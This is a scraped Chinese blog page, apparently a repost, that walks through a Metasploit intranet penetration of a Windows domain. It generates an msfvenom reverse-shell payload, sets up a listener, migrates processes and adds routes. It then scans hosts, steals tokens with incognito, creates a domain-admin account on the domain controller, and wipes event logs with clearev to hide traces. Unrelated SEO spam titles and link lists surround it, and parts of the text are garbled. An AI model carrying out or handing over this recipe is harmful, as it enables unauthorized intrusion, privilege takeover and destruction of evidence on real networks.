当前位置: 首页 > news >正文

做网站如何防止被坑广告营销顾问

做网站如何防止被坑,广告营销顾问,如何做网站图标,用织梦做政府网站老被黑零基础学黑客,搜索公众号:白帽子左一作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注&#xff…
零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全-小熊保安

本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.

一、MSF生成木马上线目标

1. 生成木马
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)

其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口

图片

2. 监听端口
命令: use exploit/multi/handler 使用msf的监听模块

设置payload: set payload windows/x64/meterpreter/reverse_tcp

这里和生成木马的时候写的payload要一样,否则会链接不上,如下图

图片

设置监听地址以及端口:

set lhost xxx.xxx.xxx.xxx
set lport 4444

设置好了之后 直接run 监听起来。

3. 弹回Meterpreter会话
将生成的msf的木马上传到目标服务器上,然后直接运行

图片

运行之后,vps的msf会收到一个弹回的meterpreter会话

图片

4. 进程迁移
为了会话的稳定性,将meterpreter shell迁移到其他不易被关闭进程上,通常是explorer.exe(文件资源管理器)

手动迁移进程命令:migrate -N ProcessName 或者 migrate PID

图片

命令执行后的回显有completed successfully即为迁移成功.

车都有12345档,msf进程迁移当然也有手动档和自动档。

如果需要自动迁移进程,在使用handler监听器的时候配置一下即可。

use exploit/multi/handler
set autorunscript migrate -N explorer.exe

做完以上操作之后就可以开始信息搜集了。

二、信息收集(随便搜集搜集得了)

可以用meterpreter的语法

也可以用让meterpreter弹回一个cmd命令窗口

meterpreter下执行execute -f cmd.exe -i或者shell即可弹回一个cmd命令

在这里插入图片描述

1. 我是谁?我在哪?

命令whoami和systeminfo回显的信息,可以看到当前权限是system

存在域并且只是一台成员机,win版本是Windwos server 2016

图片

2. 我的门牌号?女房东的门牌号?
挨批康飞哥哦 查看ip地址 ipconfig .all 走一个

可以看到本机ip是:10.1.81.100和102

域控地址是10.1.81.101

图片

为了确认一下域控地址,还是ping一下域控吧

图片

这里这两个同网段的ip是我没想到的,有没有表哥知道这样是什么意思,两者都加上了首选.

  1. 域内信息
    域内主机就俩?跟我开玩笑呢?

域控名字SRVAxxxx

域管理员倒好,就Administrator

图片

三、主机探测和存活扫描

1. 添加路由
获取当前会话的网段
run get_local_subnets 获取当前会话的网段

图片

添加路由
方法一:run autoroute -s 10.1.81.0/24
方法二:background挂起会话后运行 route add 10.1.81.0/24 1

图片

查看路由是否添加
方法一:run autoroute -p
方法二:挂起会话后运行 route print

图片

可以看到路由成功添加了。

2. 端口扫描
直接搜索端口扫描模块:search portscan 使用端口扫描

arp_sweep、tcp、udp、dbnmap等方式探测存活

auxiliary/scanner auxiliary辅助模块下的scanner里面都是扫描

在这里插入图片描述

图片

差不多得了,不扫了,扫半小时就这么点儿 恶心,下次用其他模块扫

3. 基于arp探测存活主机
图片

四、MSF-令牌窃取

进入隐身模式:use incognito

我这里已经加载过了,所以显示already been loaded

第一次加载应该是Success

图片

列出可用的令牌

图片

模拟令牌

命令:impersonate_token axxxx\Administrator

这里域名后面斜杠要写俩,不然要报错(我没试过,属于是直接抄答案了)

在这里插入图片描述

这样就窃取到了用户令牌

此次渗透到此为止…搞错了…再来

五、操作域控

图片

命令:add_user admin1 QwEr…123. -h 10.1.81.101

创建用户,提示权限不足,现在的权限是Administrator,再getsystem一下,拿到system权限

图片

图片

使用add_user添加用户以及add_group “domain admins”添加域管理员命令
添加域管命令:add_group_user “domain admins” admin1 -h 10.1.81.101

图片

进入cmd查看命令是否生效

图片
图片

成功在域控上创建一个admin1用户并且添加进了域管理员组

1.建立IPCKaTeX parse error: Undefined control sequence: \1 at position 15: 链接 命令:net use \̲1̲0.1.81.101\c “QwEr…123.” /user:xxx\admin1

图片

打完收工

2. 痕迹清理
删除创建的用户:net user admin1 /del
删除日志:clearev

图片
在这里插入图片描述
在这里插入图片描述

http://www.lbrq.cn/news/2584567.html

相关文章:

  • 公司业绩怎么发到建设厅网站上石嘴山网站seo
  • 临沂网站制作方案浙江网站建设推广
  • 利用网络媒体营销来做电商网站论文微信引流获客软件
  • 做家教网站赚钱么网络营销策略
  • 网站怎么做付款平台seo外链是什么
  • 做网站平台近期网络舆情事件热点分析
  • 石景山建网站百度营销登录
  • 双11主机 wordpress 2015seo排名
  • 网站制作 flash 修改网络推广优化工具
  • 网站建设做网站怎么做百度推广代理商加盟
  • 黑龙江生产建设兵团各连网站站长号
  • 网站建设 佛山市建立网站的步骤
  • 沉默是金歌词南京seo新浪
  • 学做陶艺作品的网站某个产品营销推广方案
  • 页面设计理念怎么写seo推广优化的方法
  • 黄山网站建设费用网络营销个人感悟小结
  • 常见的网站类型有哪些软文范例大全500
  • 个人备案可以做门户网站吗seo优化排名公司
  • 泰州网站建设案例友情链接是啥意思
  • 仿做网站google学术搜索
  • 如何知道网站是用什么语言做的推广一次多少钱
  • 网站建设登录页面怎么写重庆做网络优化公司电话
  • 可信网站身份认证百度关键词收录排名
  • 哪些网站做的最好百度电脑版官网
  • 网站建设好后如何提交搜索引擎济南seo的排名优化
  • 手表哪个网站做的好中国数据统计网站
  • 怎样做可以互动留言的网站免费发布信息
  • 快速做网站公司报价海外市场推广方案
  • 成都网站建设哪家好友情链接是什么意思
  • 自己家的电脑宽带50m做网站服务器2024年疫情还会封控吗
  • 多租户字典管理系统完整设计
  • JavaScript 性能优化实战指南:从运行时到用户体验的全面提升​
  • ThinkPHP5x,struts2等框架靶场复现
  • 二叉树算法之【前序遍历】
  • 「iOS」————weak底层原理
  • InfluxDB 与 Node.js 框架:Express 集成方案(二)